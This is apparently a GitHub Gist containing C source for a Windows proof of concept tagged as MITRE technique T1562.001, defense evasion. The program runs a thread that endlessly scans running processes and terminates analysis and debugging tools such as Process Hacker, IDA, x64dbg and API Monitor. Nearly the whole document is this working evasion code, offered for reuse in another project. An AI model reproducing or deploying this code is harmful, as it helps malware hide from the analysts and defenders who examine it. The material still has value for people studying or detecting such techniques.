Last active
June 15, 2024 01:39
-
-
Save wizardy0ga/6bbff047a36e26ca1d48032e63807071 to your computer and use it in GitHub Desktop.
T1562.001 - Impair Defenses: Disable or Modify Tools
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
Author: wizardy0ga | |
Date: June 2024 | |
Description: Spawns a thread that looks for & terminates processes that could be used for malware analysis | |
Tactic: TA0005 - Defense Evasion | |
Technique: T1562.001 - Impair Defenses: Disable or Modify Tools | |
Note: Nothing that hasn't been done before, just a bare bones PoC i coded for another project. | |
*/ | |
#include <windows.h> | |
#include <stdio.h> | |
#include <TlHelp32.h> | |
/* Processes to terminate if found */ | |
PWCHAR Processes[] = { | |
L"processhacker.exe", | |
L"ida64.exe", | |
L"x64dbg.exe", | |
L"apimonitor-x64.exe" | |
}; | |
VOID TerminateAnalysisSoftware() { | |
HANDLE hSnapshot = NULL, | |
hProcess = NULL; | |
PROCESSENTRY32 Process = { .dwSize = sizeof(PROCESSENTRY32) }; | |
WCHAR ProcNameLower [MAX_PATH * sizeof(WCHAR)]; | |
SIZE_T ProcNameSize = 0; | |
while (TRUE) { | |
/* Get a snapshot to all running processes on the system */ | |
if (!(hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0))) { continue; } | |
if (!(Process32First(hSnapshot, &Process))) { continue; } | |
do { | |
/* Make sure process name & pid is not null */ | |
if (Process.th32ProcessID && Process.szExeFile) { | |
/* Convert process name to lower case */ | |
ProcNameSize = lstrlenW(Process.szExeFile) * sizeof(WCHAR); | |
memset(ProcNameLower, '\0', sizeof(ProcNameLower)); | |
int i = 0; | |
for (; i < ProcNameSize; i++) { ProcNameLower[i] = towlower(Process.szExeFile[i]); } | |
ProcNameLower[i++] = '\0'; | |
/* Compare process name to names in array. terminate process if match is made */ | |
for (int j = 0; j < sizeof(Processes) / sizeof(PWCHAR); j++) { | |
if (lstrcmpW(ProcNameLower, Processes[j]) == 0) { | |
if (hProcess = OpenProcess(PROCESS_TERMINATE, FALSE, Process.th32ProcessID)) { | |
printf("terminated %S\n", ProcNameLower); | |
TerminateProcess(hProcess, 1); | |
} | |
} | |
} | |
} | |
} while (Process32Next(hSnapshot, &Process)); | |
} | |
} | |
int main() { | |
DWORD ThreadID = 0; | |
HANDLE hThread = NULL; | |
hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)TerminateAnalysisSoftware, 0, 0, &ThreadID); | |
if (!hThread) { | |
printf("Failed to create thread\n"); return -1; | |
} | |
printf("Created software termination thread at id %d\n", ThreadID); | |
WaitForSingleObject(hThread, INFINITE); | |
return 0; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment